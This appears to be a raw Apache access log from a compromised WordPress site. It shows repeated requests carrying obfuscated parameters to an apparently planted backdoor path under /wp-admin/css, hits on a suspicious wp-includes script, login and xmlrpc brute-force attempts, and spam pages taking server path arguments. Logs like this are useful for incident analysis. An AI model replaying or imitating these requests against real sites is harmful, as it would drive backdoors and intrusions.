142.4.205.1 - - [16/Oct/2025:18:40:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383035372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343435372q3730633930386430323839643261643961636562613637396133313665323035222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
162.241.60.179 - - [16/Oct/2025:18:42:05 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
114.119.128.196 - - [16/Oct/2025:18:42:07 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentynineteen/inc HTTP/1.0" 200 7396 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentynineteen" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.65.196 - - [16/Oct/2025:18:42:13 -0400] "GET /market/47507630.htm HTTP/1.0" 200 24669 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:41:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383037372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343437372q3632386334373065316363626631333234356166396565373664356564353430222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
162.241.60.179 - - [16/Oct/2025:18:42:21 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
142.4.205.1 - - [16/Oct/2025:18:41:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383039372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343439372q6339356365363336386332323465396534336131323939383138346337353632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:41:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383131372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343531372q6461303835323932313436666662376239633632383261383531333038643232222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:18:43:12 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4154 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:18:42:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383133372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343533372q3761663563353734326538313735646134313937383665656435626538623831222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [16/Oct/2025:18:43:29 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/maintenance/assets/fonts HTTP/1.0" 200 7202 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/maintenance/assets" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:42:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383135372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343535372q6265316235613439373262336537623130303430323236306535656439343065222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:42:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383137372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343537372q6133663166313436653733343936353865343265306261323239616434323731222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:43:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383139372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343539372q3039643131653633636536326332323437363662393930626130633537636334222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [16/Oct/2025:18:42:52 -0400] "GET /wp-includes/wpdc3def/index.php HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16"
66.249.65.197 - - [16/Oct/2025:18:44:27 -0400] "GET /?_g=297108 HTTP/1.0" 200 24971 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:43:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383231372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343631372q3735376331666137643765323038613562613061303663396134653963363366222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:44:37 -0400] "GET /?_g=81119 HTTP/1.0" 200 29599 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [16/Oct/2025:18:44:42 -0400] "GET /?_g=1463949 HTTP/1.0" 200 25761 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.152.60 - - [16/Oct/2025:18:44:53 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/post-terms HTTP/1.0" 200 7200 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:43:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383233372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343633372q3030636635646538313464323435363036356233383633366535616338376432222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:18:44:58 -0400] "GET /?_g=2430548 HTTP/1.0" 200 24589 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:44:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383235372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343635372q3739656636623236633337663332646561613036613335663065636162363532222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:18:45:20 -0400] "GET /market/126121996.htm HTTP/1.0" 200 24470 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [16/Oct/2025:18:45:29 -0400] "GET /?_g=1215637 HTTP/1.0" 200 25277 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.222.86.150 - - [16/Oct/2025:18:45:29 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
142.4.205.1 - - [16/Oct/2025:18:44:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383237372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343637372q6363353034356561393834616238636262326330373763336665306230623039222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:18:44:20 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:18:44:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383239372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343639372q6233646139643133316432643163303135386563346437653137326435616633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:18:45:58 -0400] "GET /?_g=309538 HTTP/1.0" 200 24461 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.159.98.248 - - [16/Oct/2025:18:46:02 -0400] "GET /2025/10/08/togel-digital-era-explained/ HTTP/1.0" 200 9227 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
114.96.103.33 - - [16/Oct/2025:18:46:02 -0400] "GET / HTTP/1.0" 200 9227 "http://academiedumarketing.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
66.249.65.195 - - [16/Oct/2025:18:46:06 -0400] "GET /?_g=1178713 HTTP/1.0" 200 24248 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.146.77 - - [16/Oct/2025:18:46:16 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/wp-content HTTP/1.0" 200 7602 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:45:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383331372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343731372q6464326130366563623661343864623636306631376265366537376661373538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:46:29 -0400] "GET /?_g=996019 HTTP/1.0" 200 25108 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [16/Oct/2025:18:46:29 -0400] "GET /zhHant/product/surugaya/A2684996994?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.0" 200 25723 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:45:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383333372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343733372q3066306534636666316239353162373262636330346566393761333231613863222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
196.251.83.229 - - [16/Oct/2025:18:46:51 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:18:46:51 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
196.251.83.229 - - [16/Oct/2025:18:46:51 -0400] "POST /wp-login.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0"
142.4.205.1 - - [16/Oct/2025:18:45:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383335372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343735372q3531366438363164346137653161306237353330663866383163333466313638222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:46:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383337372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343737372q3936386632653263323961643363643235333532376264313032616561653633222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:46:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383339372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343739372q3732313432383635343936306636306331333265613461326166623836653761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:18:47:40 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/jGVNHJwRnIpsga/jGVNHJwRnIpsga HTTP/1.0" 200 7196 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/jGVNHJwRnIpsga" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:46:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383431372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343831372q6637323666313235363031613762326334646130393835386361323731353130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:47:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383433372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343833372q3764336231616238616539336365633633646164623139303038353332336138222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:47:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383435372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343835372q3231353434646635653233303366386365333139343732613937323062356463222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:47:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383437372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343837372q3930333664316564373265346538373330373037663537636633373734303766222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.146.77 - - [16/Oct/2025:18:49:05 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/template-part HTTP/1.0" 200 7334 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:48:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383439372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343839372q6134306630303837613931646238343439666538323564646364333937643233222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:18:49:26 -0400] "GET /?_g=254896 HTTP/1.0" 200 23996 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:18:48:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383531372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343931372q6132633763663332343334366261633637653661393965323730633861616532222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:48:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383533372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343933372q3532386639623562343639336439376365343565393735333166366530383233222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:49:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383535372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343935372q6561376634366539316537396130623437313734643334356433356631316462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:18:50:19 -0400] "GET /?_g=290954 HTTP/1.0" 200 25045 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.141.33.200 - - [16/Oct/2025:18:50:25 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
114.119.138.172 - - [16/Oct/2025:18:50:28 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/media-text HTTP/1.0" 200 7344 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:18:49:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383537372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343937372q6631356232323965363531306237653533306564376233653339323931333436222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:18:49:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635383539372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635343939372q6131636463323232643264383433343262323439613937323430646364373731222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:18:51:14 -0400] "GET /?_g=1452983 HTTP/1.0" 200 25892 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
